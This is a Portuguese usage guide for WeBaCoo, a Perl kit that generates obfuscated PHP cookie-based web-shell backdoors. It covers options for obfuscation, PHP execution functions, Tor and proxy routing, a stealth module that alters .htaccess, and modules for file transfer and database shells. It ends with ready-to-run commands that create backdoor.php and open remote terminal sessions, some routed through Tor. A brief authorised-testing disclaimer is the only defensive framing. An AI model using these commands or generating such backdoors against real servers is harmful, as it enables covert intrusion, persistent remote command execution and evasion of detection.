
Kit de Scripts de Backdoor Web via Cookies
| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \
\ /\ / __/ |/ / (| | _/\ () | (_) |
/ / __/ _,|_/_/ _/
Web Backdoor Cookie Script-Kit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Escrito por: Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis
A ferramenta é apenas para fins de teste e só pode ser usada onde houver consentimento estrito. Não a utilize para fins ilegais.
Quaisquer modificações, alterações ou mudanças nesta aplicação são aceitáveis, no entanto, qualquer lançamento público que utilize este código deve ser aprovado pelo seu criador. Verifique o arquivo LICENSE para mais informações.
Se não desejar instalar o "libio-socket-socks-perl" para o recurso de proxy Tor, comente a linha 25 no webacoo.pl
webacoo.pl [options]
Opções: -g Gera código de backdoor (-o é obrigatório)
-f FUNCTION Função do sistema PHP a usar FUNCTION 1: system (padrão) 2: shell_exec 3: exec 4: passthru 5: popen
-o OUTPUT Nome do arquivo de saída do backdoor gerado
-r Retorna o código do backdoor sem ofuscação
-t Estabelece conexão remota "terminal" (-u é obrigatório)
-u URL URL do backdoor
-e CMD Modo de execução de comando único (-t e -u são obrigatórios)
-m METHOD Método HTTP a ser usado (padrão é "GET")
-c C_NAME Nome do cookie (padrão: "M-cookie")
-d DELIM Delimitador (padrão: Novo aleatório para cada requisição)
-a AGENT Cabeçalho HTTP user-agent (padrão existe)
-p PROXY Usar proxy (tor, ip:porta ou usuário:senha:ip:porta)
-v LEVEL Nível de verbosidade LEVEL 0: nenhuma informação adicional (padrão) 1: imprime cabeçalhos HTTP 2: imprime cabeçalhos HTTP + dados
-l LOG Registrar atividade em arquivo
-h Exibe ajuda e sai
update Verifica atualizações e aplica se houver
Desde a versão 0.2.1, foi adicionado suporte a módulos de extensão para fornecer funcionalidades extras ao WeBaCoo. No modo terminal, você pode executar 'load' para listar os módulos disponíveis e inicializar o desejado a partir da lista. Ao digitar 'unload', você pode retornar ao modo terminal inicial.
Módulos de extensão disponíveis: o mysql-cli Módulo de linha de comando MySQL o psql-cli Módulo de linha de comando Postgres o upload Módulo de upload de arquivo usando HTTP Post o download Módulo de download de arquivo usando saída padrão via 'od' & 'xxd' o stealth Módulo para aumentar o sigilo via manipulação de .htaccess
Cria 'backdoor.php' backdoor ofuscado com configurações padrão ./webacoo.pl -g -o backdoor.php
Cria 'raw-backdoor.php' backdoor sem ofuscação usando a função 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
Estabelece conexão "terminal" com o host remoto usando a configuração padrão ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
Estabelece conexão "terminal" com o host remoto enquanto define alguns argumentos ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
Estabelece conexão "terminal" com o host remoto através de proxy http local ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
Estabelece conexão "terminal" com o host remoto através de proxy http com autenticação básica ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
Estabelece conexão "terminal" com o host remoto via Tor e registra atividade ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt